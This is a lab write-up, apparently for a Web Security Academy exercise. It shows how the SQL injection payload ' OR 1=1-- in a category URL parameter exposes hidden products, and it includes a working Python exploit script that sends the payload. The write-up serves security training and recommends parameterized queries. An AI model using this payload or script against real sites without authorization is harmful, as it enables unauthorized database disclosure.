SQLi Lab 1
Exploiting a basic SQL injection vulnerability to retrieve hidden data.
SQL Injection in WHERE Clause Reveals Hidden Products#
In this lab, I explored how a simple SQL injection (SQLi) vulnerability in the WHERE clause of an SQL query can lead to information disclosure. By injecting a classic ' OR 1=1-- payload into a URL parameter, I was able to bypass category filters and extract all records from the database. Despite its simplicity, this technique is highly effective when user inputs are not properly sanitized.
This exercise reinforced how even the most basic SQLi attack vectors can severely undermine application logic, especially in web apps that rely on direct input embedding into database queries. It’s a reminder that developers must use parameterized queries or ORM-based access to prevent such issues.
How Exploit Works#
- The app filters products based on the
categoryparameter in the URL. - This value is directly embedded into the SQL
WHEREclause. - No sanitization or parameterization is performed.
- The injected payload
' OR 1=1--forces the condition to always evaluate true. - The server responds with all products in the database.
- The script confirms success by searching for a known product name in the response.
Usage#
python3 exploit.py https://<your-lab-id>.web-security-academy.netExploit#
exploit.py
import requests
import sys
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}
def exploit_sqli(url, payload):
uri = '/filter?category='
r = requests.get(url + uri + payload, verify=False, proxies=proxies)
if "Folding Gadgets" in r.text:
return True
else:
return False
if __name__ == "__main__":
try:
url = sys.argv[1].strip()
payload = "'+OR+1=1--"
except IndexError:
print("[-] Usage: %s <url>" %sys.argv[0])
print('[-] Example: %s www.example.com' % sys.argv[0])
sys.exit(-1)
if exploit_sqli(url, payload):
print("[+] SQL injection successful!")
else:
print("[-] SQL injection unsuccessful")